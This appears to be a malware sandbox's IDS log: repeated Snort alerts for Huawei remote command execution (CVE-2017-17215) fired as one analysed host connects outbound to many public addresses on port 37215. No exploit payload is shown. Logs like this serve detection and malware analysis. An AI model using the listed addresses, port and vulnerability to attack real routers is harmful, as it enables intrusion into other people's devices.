                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46274 -> 197.143.65.56:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46274 -> 197.143.65.56:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46970 -> 156.54.177.90:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46970 -> 156.54.177.90:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50488 -> 197.1.228.185:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50488 -> 197.1.228.185:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35740 -> 41.48.170.201:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35740 -> 41.48.170.201:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52952 -> 197.33.230.71:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52952 -> 197.33.230.71:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58554 -> 156.129.96.206:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58554 -> 156.129.96.206:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37748 -> 41.229.62.31:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37748 -> 41.229.62.31:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:32894 -> 41.153.119.111:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:32894 -> 41.153.119.111:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47910 -> 41.181.77.39:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47910 -> 41.181.77.39:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49752 -> 197.165.171.189:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49752 -> 197.165.171.189:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35624 -> 156.159.166.61:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35624 -> 156.159.166.61:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33150 -> 41.211.139.167:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33150 -> 41.211.139.167:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50816 -> 41.162.173.241:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50816 -> 41.162.173.241:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51920 -> 41.65.197.2:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51920 -> 41.65.197.2:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38556 -> 156.131.196.119:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38556 -> 156.131.196.119:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33748 -> 156.124.39.243:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33748 -> 156.124.39.243:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57648 -> 41.31.120.95:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57648 -> 41.31.120.95:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41208 -> 197.244.221.110:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41208 -> 197.244.221.110:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60112 -> 41.68.4.247:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60112 -> 41.68.4.247:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53058 -> 156.173.40.172:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53058 -> 156.173.40.172:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54522 -> 156.231.88.25:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54522 -> 156.231.88.25:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43196 -> 41.83.251.197:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43196 -> 41.83.251.197:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47124 -> 197.106.253.26:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47124 -> 197.106.253.26:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37946 -> 41.150.152.40:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37946 -> 41.150.152.40:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58950 -> 41.73.147.202:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58950 -> 41.73.147.202:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56152 -> 41.137.12.98:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56152 -> 41.137.12.98:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53572 -> 156.251.163.18:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53572 -> 156.251.163.18:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53602 -> 156.72.192.166:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53602 -> 156.72.192.166:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46510 -> 197.208.58.206:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46510 -> 197.208.58.206:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40518 -> 156.59.39.131:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40518 -> 156.59.39.131:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56660 -> 41.76.10.213:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56660 -> 41.76.10.213:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48532 -> 41.162.130.70:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48532 -> 41.162.130.70:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47384 -> 41.172.243.251:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47384 -> 41.172.243.251:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47582 -> 41.49.177.241:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47582 -> 41.49.177.241:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58190 -> 197.160.6.126:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58190 -> 197.160.6.126:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58632 -> 197.96.60.42:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58632 -> 197.96.60.42:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37358 -> 41.86.97.148:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37358 -> 41.86.97.148:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36760 -> 156.184.162.68:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36760 -> 156.184.162.68:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56970 -> 156.17.229.84:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56970 -> 156.17.229.84:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54224 -> 156.83.228.55:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54224 -> 156.83.228.55:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42584 -> 156.45.119.80:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42584 -> 156.45.119.80:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48158 -> 156.99.70.130:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48158 -> 156.99.70.130:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54992 -> 197.147.108.144:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54992 -> 197.147.108.144:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58608 -> 41.135.86.170:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58608 -> 41.135.86.170:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42604 -> 41.219.214.89:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42604 -> 41.219.214.89:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42436 -> 197.42.188.77:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42436 -> 197.42.188.77:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47832 -> 41.14.203.251:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47832 -> 41.14.203.251:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53274 -> 41.32.235.166:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53274 -> 41.32.235.166:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55344 -> 156.169.159.36:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55344 -> 156.169.159.36:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35026 -> 197.2.201.17:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35026 -> 197.2.201.17:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34212 -> 156.219.247.62:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34212 -> 156.219.247.62:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46586 -> 41.59.10.212:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46586 -> 41.59.10.212:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58234 -> 41.129.130.21:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58234 -> 41.129.130.21:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52520 -> 41.169.58.138:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52520 -> 41.169.58.138:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39164 -> 41.180.54.14:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39164 -> 41.180.54.14:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39700 -> 156.205.118.79:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39700 -> 156.205.118.79:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46516 -> 41.75.213.161:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46516 -> 41.75.213.161:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44680 -> 156.60.18.213:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44680 -> 156.60.18.213:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59590 -> 197.193.225.65:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59590 -> 197.193.225.65:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47616 -> 156.99.46.18:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47616 -> 156.99.46.18:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48236 -> 156.235.113.156:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48236 -> 156.235.113.156:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48720 -> 156.63.123.182:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48720 -> 156.63.123.182:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44374 -> 41.150.127.110:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44374 -> 41.150.127.110:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39874 -> 41.221.245.45:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39874 -> 41.221.245.45:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38536 -> 197.164.90.89:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38536 -> 197.164.90.89:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48016 -> 197.72.101.78:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48016 -> 197.72.101.78:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35074 -> 41.103.79.200:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35074 -> 41.103.79.200:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52620 -> 197.55.64.7:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52620 -> 197.55.64.7:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33880 -> 41.103.189.205:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33880 -> 41.103.189.205:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41358 -> 41.60.252.190:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41358 -> 41.60.252.190:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42332 -> 197.160.179.42:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42332 -> 197.160.179.42:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53860 -> 41.117.177.184:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53860 -> 41.117.177.184:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54158 -> 197.75.9.62:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54158 -> 197.75.9.62:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42408 -> 41.201.118.253:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42408 -> 41.201.118.253:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59080 -> 197.35.88.66:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59080 -> 197.35.88.66:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50422 -> 41.122.39.98:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50422 -> 41.122.39.98:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52978 -> 156.59.140.170:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52978 -> 156.59.140.170:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46688 -> 156.146.20.194:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46688 -> 156.146.20.194:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46878 -> 197.74.88.212:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46878 -> 197.74.88.212:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46504 -> 197.2.165.202:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46504 -> 197.2.165.202:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54622 -> 156.155.120.11:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54622 -> 156.155.120.11:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39346 -> 41.225.163.169:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39346 -> 41.225.163.169:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51960 -> 197.168.230.94:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51960 -> 197.168.230.94:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55032 -> 197.95.168.17:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55032 -> 197.95.168.17:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34844 -> 197.237.52.108:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34844 -> 197.237.52.108:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54138 -> 41.16.196.29:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54138 -> 41.16.196.29:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58974 -> 197.228.135.200:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58974 -> 197.228.135.200:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47012 -> 41.148.2.72:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47012 -> 41.148.2.72:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54048 -> 197.142.78.120:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54048 -> 197.142.78.120:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55450 -> 197.136.147.208:37215
